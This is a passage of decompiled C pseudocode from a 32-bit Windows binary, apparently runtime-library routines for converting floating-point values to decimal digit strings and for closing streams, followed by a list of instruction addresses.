													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E0027DDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0028AA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E0028AA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0x296a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0x296a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0x296a06 + _t812 * 4) & 0x000000ff) + ( *(0x296a07 + _t812 * 4) & 0x000000ff);
												E0027E920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E0027EA80( &(( &_v1396)[_t1097]), 0x296100 + ( *(0x296a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x296a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E0028AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0028AA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E0028AA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0x296a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0x296a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0x296a06 + _t908 * 4) & 0x000000ff) + ( *(0x296a07 + _t908 * 4) & 0x000000ff);
												E0027E920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E0027EA80( &(( &_v1396)[_t1104]), 0x296100 + ( *(0x296a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x296a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E0028AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E0028AA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E0028AA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E0028AA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E0028AA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E0028C0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E0028AA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E0028AA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E0028C0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x296ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E002879F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00287DBB();
							asm("int3");
							E0027E2F0(_t1142, 0x29a9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00289931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0x2c0404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0x2c0408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0x2c0408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E0028EC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0x2c0408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0x2c0408; // 0x0
									E00287A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0x2c0408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E0028D991();
							return E0027E336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E0028DFE5(_t1070, _t1286,  &_v1944);
							}
							return E0027E203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}

0x0028c55e
0x0028c561
0x0028c563
0x0028c569
0x0028c570
0x0028c574
0x0028c57d
0x0028c57e
0x0028c57f
0x0028c582
0x0028c588
0x0028c58e
0x0028c593
0x0028c5a2
0x0028c5a4
0x0028c5a6
0x0028c5a6
0x0028c5ad
0x0028c5b7
0x0028c5bc
0x0028c5bf
0x0028c5e3
0x0028c5e7
0x0028c5ec
0x0028c5ed
0x0028c5ef
0x0028c5f1
0x0028c5f7
0x0028c5f7
0x0028c5fe
0x0028c5fe
0x0028c601
0x0028d8b1
0x00000000
0x0028c607
0x0028c607
0x0028c607
0x0028c60a
0x0028d8aa
0x00000000
0x0028c610
0x0028c610
0x0028c610
0x0028c613
0x0028d8a3
0x00000000
0x0028c619
0x0028c619
0x0028c61c
0x0028d89c
0x00000000
0x0028c622
0x0028c62b
0x0028c633
0x0028c636
0x0028c639
